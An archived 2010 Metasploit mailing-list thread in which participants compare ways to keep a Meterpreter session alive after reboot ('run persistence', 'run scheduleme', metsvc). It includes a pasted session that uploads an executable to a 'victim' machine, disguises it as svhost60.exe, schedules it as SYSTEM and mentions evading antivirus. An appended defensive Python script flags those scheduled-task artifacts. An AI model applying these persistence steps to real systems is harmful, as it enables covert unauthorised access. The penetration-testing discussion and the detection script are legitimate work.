Metasploit mailing list archives
Re: A little more about the metsvc service .
From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Wed, 7 Jul 2010 16:19:25 +0300
"run persistence" is a nice way to make sure your meterpreter will survive a reboot, but I use it mostly when I have no admin rights.

I'm usually using "run scheduleme" as a backup plan. You have to be admin or SYSTEM, UAC must be disabled "if Vista", and you have to have a meterpreter.exe file ready to be uploaded, since it won't create one for you on the fly like "run persistence does, VBS". I really wish there were an option inside "run scheduleme" to create meterpreter payloads on the fly to save one step, but no complaints.

Anyway, the good thing is that using this method your meterpreter session will always be started as "SYSTEM". It will copy the executable to a temp folder and rename it to something like "svhostXX.exe", so you have to beware of AVs to make sure that it won't be caught. Then it'll schedule its execution based on the given options in a task named "syscheckXX", and tell you how to undo the whole thing "thanks HD!".

If the prerequisites of run scheduleme bother you, just stick to run persistence, since it works sometimes with normal users "when choosing the option to run at user login, not system startup":

meterpreter > run scheduleme -h
Scheduleme -- provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

    -c <opt>   Command to execute at the given time. If options for execution needed use double quotes
    -d         Daily.
    -e <opt>   Executable or script to upload to target host, will not work with remote schedule
    -h         Help menu.
    -hr <opt>  Every specified hours 1-23.
    -i         Run command imediatly and only once.
    -l         When a user logs on.
    -m <opt>   Every specified amount of minutes 1-1439
    -o <opt>   Options for executable when upload method used
    -p         Password for account provided.
    -r         Remote Schedule. Executable has to be already on remote target
    -s         At system startup.
    -t <opt>   Remote system to schedule job.
    -u         Username of account with administrative privelages.

meterpreter > run scheduleme -e /root/IA.exe -m 30
[*] Uploading /root/IA.exe....
[*] /root/IA.exe uploaded!
[*] Scheduling command C:\DOCUME~1\victim\LOCALS~1\Temp\svhost60.exe to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck65 /F
meterpreter >

sherif.

-----Original Message-----
From: framework-bounces () spool metasploit com [mailto:framework-bounces () spool metasploit com] On Behalf Of Matt Gardenghi
Sent: Wednesday, July 07, 2010 3:44 PM
To: framework () spool metasploit com
Subject: Re: [framework] A little more about the metsvc service .

My experience with metsvc is that it has a memory leak.... I've had it tank multiple systems before I figured that out.

I haven't played with it yet, but the supported technique is to use "run persistence." You might want to look into spending time there instead.

Matt

On 7/7/2010 4:23 AM, ubt wrote:
What if I insert a small code to ask for a password authentication in the _try do block of the server_setup.c beforehand, and one can't install the metsvc service again to overwrite an installed metsvc service?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
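Added example, not part of the original thread or of Metasploit: a defender-side check that scans the CSV produced by "schtasks /query /fo csv /v" for the artifacts the message above describes (a task named "syscheckXX" launching "svhostXX.exe" from a temp folder). The host name and every sample row except the path and task name quoted from the post are constructed, and only three of the verbose columns are included.

```python
import csv
import io
import re

# Naming patterns taken from the post: task "syscheckXX", binary "svhostXX.exe".
TASK_RE = re.compile(r"^\\?syscheck\d+$", re.IGNORECASE)
BIN_RE = re.compile(r"[\\/]svhost\d+\.exe\b", re.IGNORECASE)
# Any command launched out of a Temp/Tmp directory (covers LOCALS~1\Temp too).
TEMP_RE = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)


def flag_tasks(csv_text):
    """Return [(task_name, [reasons])] for tasks matching any indicator."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName") or ""
        if name == "TaskName":  # schtasks can repeat the header row
            continue
        cmd = row.get("Task To Run") or ""
        reasons = []
        if TASK_RE.match(name):
            reasons.append("task-name")
        if BIN_RE.search(cmd):
            reasons.append("binary-name")
        if TEMP_RE.search(cmd):
            reasons.append("runs-from-temp")
        if reasons:
            findings.append((name, reasons))
    return findings


# Constructed sample; only the first data row uses values shown in the post.
SAMPLE = r'''"HostName","TaskName","Task To Run","Run As User"
"WS01","\syscheck65","C:\DOCUME~1\victim\LOCALS~1\Temp\svhost60.exe","SYSTEM"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM"
"WS01","\Backup","C:\Windows\System32\svchost.exe -k netsvcs","SYSTEM"
"WS01","\Updater","C:\Users\bob\AppData\Local\Temp\upd.exe","bob"
'''

if __name__ == "__main__":
    for task, why in flag_tasks(SAMPLE):
        print(f"{task}: {', '.join(why)}")
```

A task that matches only "runs-from-temp" is a weaker signal than one that matches all three, so triage on the reason list rather than on the bare hit.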
Current thread:
- A little more about the metsvc service . ubt (Jul 07)
- Re: A little more about the metsvc service . Matt Gardenghi (Jul 07)
- Re: A little more about the metsvc service . Sherif Eldeeb (Jul 07)
- Re: A little more about the metsvc service . Matt Gardenghi (Jul 07)